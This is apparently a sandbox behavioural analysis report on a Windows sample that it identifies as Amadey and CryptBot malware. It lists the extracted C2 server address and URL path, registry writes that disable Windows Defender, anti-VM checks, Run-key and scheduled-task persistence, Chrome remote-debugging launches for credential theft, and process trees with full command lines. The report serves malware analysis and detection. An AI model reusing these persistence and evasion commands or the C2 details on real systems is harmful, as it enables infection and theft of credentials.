Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 22:08
Static task
static1
Behavioral task
behavioral1
Sample
526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe
Resource
win7-20241023-en
General
-
Target
526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe
-
Size
3.0MB
-
MD5
219da011bad6ca9985808a7b2ef7c533
-
SHA1
20a1cc202b667a1646ba8dc862fc6b83863270f1
-
SHA256
526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d
-
SHA512
0c3741c1ff33d6b40be3a11611d0e99f201ba976b70467aa54720443e5bddd3177e419324173a89ec46492e64c33f33b542e8e8f5c3ac6bc18cccad75e69df4b
-
SSDEEP
49152:uy6wMYLfP1XiKZjadNJWuLSAxYMms6tpFAp7LBBdItN+CsTy3KvRa5W3PZfX:uy6wMYzNXiKBEJ5SAxp6h+NTnJ
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Cryptbot family
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
resource yara_rule behavioral2/memory/4532-73-0x0000000069CC0000-0x000000006A71B000-memory.dmp family_cryptbot_v3 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e123ad25ab.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 52be08c7ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 15dba81e51.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e123ad25ab.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4f74f6c8b5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4392 powershell.exe 4392 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2460 chrome.exe 3888 chrome.exe 3436 chrome.exe 3376 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e123ad25ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 52be08c7ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 15dba81e51.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4f74f6c8b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4f74f6c8b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e123ad25ab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 52be08c7ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 15dba81e51.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation decrypted_executable.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 4f74f6c8b5.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe curl.exe -
Executes dropped EXE 16 IoCs
pid Process 2440 skotes.exe 4900 8c08752158.exe 1184 exploma.exe.exe 4532 4f74f6c8b5.exe 4392 skotes.exe 1296 babababa.exe 1408 decrypted_executable.exe 436 52be08c7ca.exe 1248 DataStore1.exe 3648 service123.exe 4292 15dba81e51.exe 812 e123ad25ab.exe 1412 skotes.exe 2392 service123.exe 4268 skotes.exe 5080 service123.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 52be08c7ca.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 15dba81e51.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine e123ad25ab.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 4f74f6c8b5.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe -
Loads dropped DLL 3 IoCs
pid Process 3648 service123.exe 2392 service123.exe 5080 service123.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features e123ad25ab.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" e123ad25ab.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c08752158.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005824001\\8c08752158.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\52be08c7ca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006060001\\52be08c7ca.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\15dba81e51.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006061001\\15dba81e51.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e123ad25ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006063001\\e123ad25ab.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\exploma.exe = "C:\\Users\\Admin\\AppData\\Local\\exploma.exe.exe" 8c08752158.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 2440 skotes.exe 4532 4f74f6c8b5.exe 4392 skotes.exe 436 52be08c7ca.exe 4292 15dba81e51.exe 436 52be08c7ca.exe 812 e123ad25ab.exe 1412 skotes.exe 4268 skotes.exe -
resource yara_rule behavioral2/files/0x000b000000023b7a-148.dat upx behavioral2/memory/1408-149-0x0000000140000000-0x0000000140026000-memory.dmp upx behavioral2/memory/1408-183-0x0000000140000000-0x0000000140026000-memory.dmp upx behavioral2/memory/1408-191-0x0000000140000000-0x0000000140026000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 232 4532 WerFault.exe 101 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 15dba81e51.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e123ad25ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4f74f6c8b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 52be08c7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2376 cmd.exe 1120 cmd.exe 1904 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4f74f6c8b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4f74f6c8b5.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1904 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 2440 skotes.exe 2440 skotes.exe 4532 4f74f6c8b5.exe 4532 4f74f6c8b5.exe 4392 skotes.exe 4392 skotes.exe 2460 chrome.exe 2460 chrome.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 4292 15dba81e51.exe 4292 15dba81e51.exe 436 52be08c7ca.exe 436 52be08c7ca.exe 812 e123ad25ab.exe 812 e123ad25ab.exe 1412 skotes.exe 1412 skotes.exe 812 e123ad25ab.exe 812 e123ad25ab.exe 3252 msedge.exe 3252 msedge.exe 2752 msedge.exe 2752 msedge.exe 4360 identity_helper.exe 4360 identity_helper.exe 4268 skotes.exe 4268 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeShutdownPrivilege 2460 chrome.exe Token: SeCreatePagefilePrivilege 2460 chrome.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 812 e123ad25ab.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2460 chrome.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe 2752 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3512 wrote to memory of 2440 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 86 PID 3512 wrote to memory of 2440 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 86 PID 3512 wrote to memory of 2440 3512 526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe 86 PID 2440 wrote to memory of 4900 2440 skotes.exe 92 PID 2440 wrote to memory of 4900 2440 skotes.exe 92 PID 4900 wrote to memory of 2376 4900 8c08752158.exe 93 PID 4900 wrote to memory of 2376 4900 8c08752158.exe 93 PID 2376 wrote to memory of 1120 2376 cmd.exe 95 PID 2376 wrote to memory of 1120 2376 cmd.exe 95 PID 1120 wrote to memory of 1904 1120 cmd.exe 97 PID 1120 wrote to memory of 1904 1120 cmd.exe 97 PID 1120 wrote to memory of 1184 1120 cmd.exe 98 PID 1120 wrote to memory of 1184 1120 cmd.exe 98 PID 2440 wrote to memory of 4532 2440 skotes.exe 101 PID 2440 wrote to memory of 4532 2440 skotes.exe 101 PID 2440 wrote to memory of 4532 2440 skotes.exe 101 PID 4532 wrote to memory of 2460 4532 4f74f6c8b5.exe 104 PID 4532 wrote to memory of 2460 4532 4f74f6c8b5.exe 104 PID 2460 wrote to memory of 3808 2460 chrome.exe 105 PID 2460 wrote to memory of 3808 2460 chrome.exe 105 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 1624 2460 chrome.exe 106 PID 2460 wrote to memory of 448 2460 chrome.exe 107 PID 2460 wrote to memory of 448 2460 chrome.exe 107 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108 PID 2460 wrote to memory of 3448 2460 chrome.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe"C:\Users\Admin\AppData\Local\Temp\526e7692bca7ee6efee8c13d543791dcae7f1cc6ac74651b6b2fb94f7c8cbe6d.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\1005824001\8c08752158.exe"C:\Users\Admin\AppData\Local\Temp\1005824001\8c08752158.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\exploma.exe.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\cmd.execmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\exploma.exe.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\PING.EXEping localhost -n 16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1904
-
-
C:\Users\Admin\AppData\Local\exploma.exe.exeC:\Users\Admin\AppData\Local\exploma.exe.exe6⤵
- Executes dropped EXE
PID:1184
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1005956001\4f74f6c8b5.exe"C:\Users\Admin\AppData\Local\Temp\1005956001\4f74f6c8b5.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdbd8acc40,0x7ffdbd8acc4c,0x7ffdbd8acc585⤵PID:3808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:25⤵PID:1624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:35⤵PID:448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2464 /prefetch:85⤵PID:3448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:15⤵
- Uses browser remote debugging
PID:3888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:15⤵
- Uses browser remote debugging
PID:3436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,11616498583358123983,14802208552622446323,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:15⤵
- Uses browser remote debugging
PID:3376
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3648
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 18604⤵
- Program crash
PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"3⤵
- Executes dropped EXE
PID:1296 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"4⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exeC:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1408 -
